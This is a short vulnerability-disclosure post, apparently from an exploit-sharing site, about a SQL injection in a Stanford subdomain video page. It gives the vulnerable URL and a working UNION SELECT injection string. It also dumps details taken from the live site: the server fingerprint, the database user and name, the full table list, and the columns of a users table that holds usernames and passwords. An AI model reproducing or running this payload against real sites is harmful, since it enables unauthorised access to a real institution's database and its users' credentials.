-----------------------------------------------------------------------------------------------
[+] Stanford.edu suffers from a remote SQL injection vulnerability
[+] Found By: Rohit Bansal
[+] Date: 06-02-2009
---------------------------------------------------------------------------------------------

Host Information

Server           = Apache/2.2.3 (Debian) mod_fastcgi/2.4.2 PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c WebAuth/3.6.0
Version          = 5.0.51a-19~bpo40+1-log
Powered by       = PHP/5.2.0-8+etch13
Current User     = genvironmentwoo@www5.Stanford.EDU
Current Database = g_environment_woodsfacultydb
Supports Union   = yes
Union Columns    = 12

Url| http://woods.stanford.edu/cgi-bin/video.php?videoid=23

Vuln: http://woods.stanford.edu/cgi-bin/video.php?videoid=23 +and+1=0+ Union Select 1 ,2,3, UNHEX(HEX([visible])) ,5,6,7,8,9,10,11,12

Comment: --
Visible Column: 4
Hexed: True

Database:g_environment_woodsfacultydb
information_schema
g_environment_woodsfacultydb

Tables:users
StudentGroups adcouncil agendas announcements biofuels carbon cccp ecosystem
events evp evpIDseed evpRFP evploi evppeople evpreport facultydb globalwater
groundwater homepage images locations loiReviewers loireview mailinglist news
newssource pacsalmon rfpreview seeds staff staffCenters users video waterwest
woodsnews

Columns:
Table users
username password fullname fname lname auth_state timestamp cryptword

---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] SecurenSafe, Schap.org, Infysec, Evilfinger,
---------------------------------------------------------------------------------------